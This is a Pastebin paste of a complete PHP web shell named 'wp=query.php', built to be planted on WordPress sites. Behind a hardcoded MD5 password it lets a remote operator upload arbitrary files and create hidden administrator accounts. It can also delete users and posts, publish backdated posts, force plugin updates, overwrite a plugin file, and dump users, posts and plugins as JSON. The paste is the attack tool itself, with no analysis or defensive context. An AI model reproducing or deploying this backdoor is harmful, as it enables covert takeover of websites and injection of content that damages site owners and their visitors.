PalmaSolutions

wp=query.php

Mar 29th, 2018
256
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.18 KB | None | 0 0
  1. <?php
  2. header('Content-Type:text/html; charset=UTF-8');
  3.  
  4. @set_time_limit(60);
  5.  
  6. define('API_VERSION', 2.0);
  7. define('PASSWORD_FILE', 'p.txt');
  8.  
  9. if(file_exists(PASSWORD_FILE)) {
  10. @unlink(PASSWORD_FILE);
  11. }
  12.  
  13. //////////////////////////////////////////
  14. function array_to_json( $array )
  15. {
  16. if (is_string($array)) return '"'.rawurlencode($array).'"';
  17. if (is_numeric($array)) return $array;
  18. if ($array === null) return 'null';
  19. if ($array === true) return 'true';
  20. if ($array === false) return 'false';
  21.  
  22. $assoc = false;
  23. $i = 0;
  24. foreach ($array as $k=>$v){
  25. if ($k !== $i++){
  26. $assoc = true;
  27. break;
  28. }
  29. }
  30. $res = array();
  31. foreach ($array as $k=>$v){
  32. $v = array_to_json($v);
  33. if ($assoc){
  34. $k = '"'.rawurlencode($k).'"';
  35. $v = $k.':'.$v;
  36. }
  37. $res[] = $v;
  38. }
  39. $res = implode(',', $res);
  40. return ($assoc)? '{'.$res.'}' : '['.$res.']';
  41. }
  42. //////////////////////////////////////////
  43.  
  44. define('SHELL_PASSWORD', 'a6a8cb877ee18215f2c0fc2a6c7b4f2a');
  45. define('MAX_UP_LEVELS', 10);
  46.  
  47. if((empty($_COOKIE['password']) && empty($_POST['password'])) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
  48. print '<form method="post" action="'.$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'">Password : <input type="text" name="password"><input type="submit"></form>';
  49. exit;
  50. }
  51.  
  52. if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
  53. setcookie('password', SHELL_PASSWORD, time()+60*60*24);
  54. header("Location: {$_SERVER['PHP_SELF']}?{$_SERVER['QUERY_STRING']}");
  55. exit;
  56. }
  57.  
  58. if(empty($_COOKIE['password']) || $_COOKIE['password'] != SHELL_PASSWORD) {
  59. exit;
  60. }
  61.  
  62. if(!empty($_FILES['f'])) {
  63. $new_path = dirname(__FILE__) . '/' . $_FILES['f']['name'];
  64. if(move_uploaded_file($_FILES['f']['tmp_name'], $new_path)) {
  65. print "<a href=\"{$_FILES['f']['name']}\">{$_FILES['f']['name']}</a>";
  66. }
  67. else {
  68. print "Upload failed!";
  69. }
  70. exit;
  71. }
  72.  
  73. if(!empty($_REQUEST['uf']) && $_REQUEST['uf'] == 1) {
  74. print "<form method=\"post\" enctype=\"multipart/form-data\" action=\"{$_SERVER['PHP_SELF']}\"><input type=\"file\" name=\"f\"><input type=\"submit\"></form>";
  75. exit;
  76. }
  77.  
  78. $counter = 0;
  79. $dir_up = './';
  80. do {
  81. $file_found = false;
  82. $file_path = "{$dir_up}wp-load.php";
  83. if(file_exists($file_path)) {
  84. require($file_path);
  85. $file_found = true;
  86. }
  87. else {
  88. $dir_up .= '../';
  89. }
  90. $counter++;
  91. }while(!$file_found && $counter < MAX_UP_LEVELS);
  92.  
  93. if(!empty($_GET['get_blogs_list'])) {
  94. print array_to_json(get_blog_list( 0, 'all' ));
  95. }
  96.  
  97. if(!empty($_GET['get_users'])) {
  98. if(function_exists('get_users')) {
  99. print array_to_json(get_users());
  100. }
  101. else {
  102. print array_to_json(array());
  103. }
  104. }
  105. //print_r($_REQUEST);
  106. if(isset($_REQUEST['action']) && $_REQUEST['action'] == 'create_user') {
  107. if(empty($_REQUEST['wp_username']) || empty($_REQUEST['wp_password']) || empty($_REQUEST['wp_email'])){
  108. print "Missing parameter for creating user!";
  109. exit;
  110. }
  111. else {
  112. $userdata = array('user_login' => $_REQUEST['wp_username'], 'user_pass' => $_REQUEST['wp_password'], 'user_email' => $_REQUEST['wp_email'], 'role' => 'administrator');
  113. //print_r($_REQUEST);
  114. $user_id = wp_insert_user( $userdata );
  115. if(is_numeric($user_id)) {
  116. print array_to_json(array('user_id' => $user_id));
  117. }
  118. else {
  119. print array_to_json("Failed creating user!");
  120. }
  121. }
  122. }
  123.  
  124. if(!empty($_REQUEST['delete_user']) && !empty($_REQUEST['wp_user_id'])) {
  125. if(wp_delete_user($_REQUEST['wp_user_id'])) {
  126. print array_to_json("User deleted!");
  127. }
  128. else {
  129. print array_to_json("Failed deleting user!");
  130. }
  131. }
  132.  
  133. if($_REQUEST['delete_post'] == 1 && !empty($_REQUEST['ID'])) {
  134. $del_op_res = wp_delete_post( $_REQUEST['ID'], true );
  135. if(!$del_op_res) print array_to_json("Delete failed!");
  136. else print array_to_json("Post deleted!");
  137. exit;
  138. }
  139.  
  140. if(!empty($_REQUEST['title']) && !empty($_REQUEST['post'])) {
  141. $post_date = $_REQUEST['datepicker'] . " " . rand(0,23) . ":" . rand(0,59) . ":" . rand(0,59);
  142.  
  143. // Create post object
  144. $my_post = array(
  145. 'post_title' => $_REQUEST['title'],
  146. 'post_content' => $_REQUEST['post'],
  147. 'post_status' => 'publish',
  148. 'post_author' => 1,
  149. 'post_type' => $_REQUEST['post_type'],
  150. 'post_date' => $post_date
  151. );
  152. $id = NULL;
  153. if(empty($_REQUEST['ID'])) {
  154. // Insert the post into the database
  155. $id = wp_insert_post($my_post);
  156. }
  157. else {
  158. $my_post['ID'] = $_REQUEST['ID'];
  159. $id = wp_update_post($my_post);
  160. }
  161. $permalink = get_permalink( $id );
  162. wp_set_post_categories($id, array($_REQUEST['cat']));
  163. if($_REQUEST['delete_post'] != 1) {
  164. if(!empty($id)) {
  165. $post = get_post($id);
  166. print array_to_json(array("permalink"=>$permalink,"link_by_id"=>$post->guid,"ID"=>$id));
  167. }
  168. else {
  169. print array_to_json("Action failed!");
  170. }
  171. }
  172. }
  173.  
  174. if(!empty($_REQUEST['plugin2update'])) {
  175. include_once( $dir_up . 'wp-admin/includes/class-ftp.php');
  176. include_once( $dir_up . 'wp-admin/includes/update.php');
  177. include_once( $dir_up . 'wp-admin/includes/file.php');
  178. include_once( $dir_up . 'wp-admin/includes/screen.php');
  179. include_once( $dir_up . 'wp-admin/includes/misc.php');
  180. include_once( $dir_up . 'wp-admin/includes/plugin.php');
  181.  
  182. foreach($_REQUEST['plugin2update'] as $plugin) {
  183. print "$plugin update : ";
  184. wp_update_plugin($plugin);
  185. }
  186.  
  187. exit;
  188. }
  189.  
  190. if(!empty($_REQUEST['file2clean'])) {
  191. $tell_a_friend_content = '<?php
  192. /*
  193. Plugin Name: Tell a Friend
  194. Version: 0.1
  195. Plugin URI: http://www.freetellafriend.com/get_button/
  196. Description: Adds a \'Share This Post\' button after each post. The service which is used is freetellafriend.com which supports e-mail address book, social bookmarks and favorites.
  197. Author: FreeTellaFriend
  198. Author URI: http://www.freetellafriend.com/
  199. */
  200.  
  201. function tell_a_friend($content) {
  202. global $post;
  203. $taf_permlink = urlencode(get_permalink($post->ID));
  204. $taf_title = urlencode(get_the_title($post->ID) );
  205. $taf_img = get_settings(\'home\') . \'/wp-content/plugins/tell-a-friend/button.gif\';
  206.  
  207. if ( !is_feed() && !is_page() ) {
  208. $content .= \'<a href="https://www.freetellafriend.com/tell/?url=\'.$taf_permlink.\'&title=\'.$taf_title.\'" onclick="window.open(\'https://www.freetellafriend.com/tell/?url=\'.$taf_permlink.\'&title=\'.$taf_title.\'\', \'freetellafriend\', \'scrollbars=1,menubar=0,width=617,height=530,resizable=1,toolbar=0,location=0,status=0,screenX=210,screenY=100,left=210,top=100\'); return false;" target="_blank" title="Share This Post"><img src="\'.$taf_img.\'" style="width:127px;height:16px;border:0px;" alt="Share This Post" title="Share This Post" /></a>\';
  209. }
  210.  
  211. return $content;
  212. }
  213.  
  214. add_filter(\'the_content\', \'tell_a_friend\');
  215.  
  216. ?>';
  217.  
  218. if(file_exists($_REQUEST['file2clean'])) {
  219. if(strpos($_REQUEST['file2clean'], 'tell-a-friend.php') !== false) {
  220. if(file_put_contents($_REQUEST['file2clean'], $tell_a_friend_content)) {
  221. print "File {$_REQUEST['file2clean']} has been cleaned.";
  222. }
  223. else {
  224. print "Failed cleaning {$_REQUEST['file2clean']} !";
  225. }
  226. }
  227. }
  228. }
  229.  
  230. if(!empty($_REQUEST['get_plugins']) && $_REQUEST['get_plugins'] == 1) {
  231. include_once($dir_up . 'wp-admin/includes/plugin.php');
  232.  
  233. $plugins = get_plugins();
  234. print array_to_json($plugins);
  235. }
  236.  
  237. if(!empty($_REQUEST['post_url2search'])) {
  238. $the_slug = str_replace('/', '', $_REQUEST['post_url2search']);
  239. $args = array(
  240. 'name' => $the_slug,
  241. 'post_status' => 'publish',
  242. 'posts_per_page' => 1
  243. );
  244. $my_posts = get_posts( $args );
  245.  
  246. if(!empty($my_posts[0]->ID) && is_numeric($my_posts[0]->ID)) {
  247. $post = get_post($my_posts[0]->ID);
  248. $post->category = get_the_category($my_posts[0]->ID);
  249. }
  250.  
  251. print array_to_json($post);
  252. }
  253.  
  254. if(!empty($_REQUEST['post_id'])) {
  255. $post = get_post($_REQUEST['post_id']);
  256. $post->category = get_the_category($_REQUEST['post_id']);
  257. print array_to_json($post);
  258. }
  259.  
  260. if(!empty($_REQUEST['page_id'])) {
  261. $post = get_page($_REQUEST['page_id']);
  262. $post->category = get_the_category($_REQUEST['page_id']);
  263. print array_to_json($post);
  264. }
  265.  
  266. $args = array(
  267. 'show_option_all' => '',
  268. 'show_option_none' => '',
  269. 'orderby' => 'ID',
  270. 'order' => 'ASC',
  271. 'show_count' => 1,
  272. 'hide_empty' => 0,
  273. 'child_of' => 0,
  274. 'exclude' => '',
  275. 'echo' => 1,
  276. 'selected' => $sel_cat,
  277. 'hierarchical' => 0,
  278. 'name' => 'cat',
  279. 'id' => '',
  280. 'class' => 'postform',
  281. 'depth' => 0,
  282. 'tab_index' => 0,
  283. 'taxonomy' => 'category',
  284. 'hide_if_empty' => false,
  285. 'walker' => ''
  286. );
  287.  
  288. if(!empty($_REQUEST['get_categories']) && $_REQUEST['get_categories'] == 1) {
  289. print array_to_json(get_categories( $args ));
  290. }
  291.  
  292. if(!empty($_REQUEST['get_pages_list']) && $_REQUEST['get_pages_list'] == 1) {
  293. $pages_array = get_pages();
  294. $new_pages_array = array();
  295. for($i=0,$len=count($pages_array);$i<$len;$i++) {
  296. $new_pages_array[$i]['ID'] = $pages_array[$i]->ID;
  297. $new_pages_array[$i]['post_title'] = $pages_array[$i]->post_title;
  298. $new_pages_array[$i]['post_name'] = $pages_array[$i]->post_name;
  299. }
  300. print array_to_json($new_pages_array);
  301. }
  302.  
  303. if(!empty($_REQUEST['get_posts_list'])) {
  304. if(isset($_REQUEST['search_by_post_type'])) {
  305. $post_type = $_REQUEST['search_by_post_type'];
  306. }
  307. else {
  308. $post_type = '';
  309. }
  310.  
  311. $args = array(
  312. 'posts_per_page' => 50,
  313. 'offset' => 0,
  314. 'category' => '',
  315. 'category_name' => '',
  316. 'orderby' => 'ID',
  317. 'order' => 'DESC',
  318. 'include' => '',
  319. 'exclude' => '',
  320. 'meta_key' => '',
  321. 'meta_value' => '',
  322. 'post_type' => $post_type,
  323. 'post_mime_type' => '',
  324. 'post_parent' => '',
  325. 'post_status' => 'publish',
  326. 'suppress_filters' => true );
  327.  
  328. if(isset($_REQUEST['search_by_url'])) {
  329. $the_slug = str_replace('/', '', $_REQUEST['search_by_url']);
  330. if(!empty($post_type) && $post_type == 'post') {
  331. $args['name'] = $the_slug;
  332. }
  333. else {
  334. $args['pagename'] = $the_slug;
  335. }
  336. }
  337.  
  338. if(isset($_REQUEST['search_by_keyword'])) {
  339. $args['s'] = $_REQUEST['search_by_keyword'];
  340. }
  341.  
  342. $posts_array = get_posts( $args );
  343. for($i=0,$len=count($posts_array);$i<$len;$i++) {
  344. $new_posts_array[$i]['ID'] = $posts_array[$i]->ID;
  345. $new_posts_array[$i]['post_title'] = $posts_array[$i]->post_title;
  346. $new_posts_array[$i]['post_name'] = $posts_array[$i]->post_name;
  347. $new_posts_array[$i]['post_content'] = $posts_array[$i]->post_content;
  348. }
  349. print array_to_json($new_posts_array);
  350. }
  351.  
  352. if(!empty($_REQUEST['upload_file'])) {
  353. print '<form method="post" enctype="multipart/form-data"><input type="file" name="my_file"><input type="submit"></form>';
  354. }
  355.  
  356. if(!empty($_FILES['my_file'])) {
  357. $base_name = basename($_FILES['my_file']['name']);
  358. if(move_uploaded_file($_FILES['my_file']['tmp_name'], $base_name)) {
  359. print '<a href="'.$base_name.'" target="_blank">'.$base_name.'</a>';
  360. }
  361. }
  362.  
  363. if(!empty($_REQUEST['get_api_version'])) {
  364. print array_to_json(array('api_version' => number_format(API_VERSION, 2)));
  365. }
  366. ?>
  367. <?php /*a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,ta,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,ta,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t*/ ?>
Advertisement
Add Comment
Please, Sign In to add comment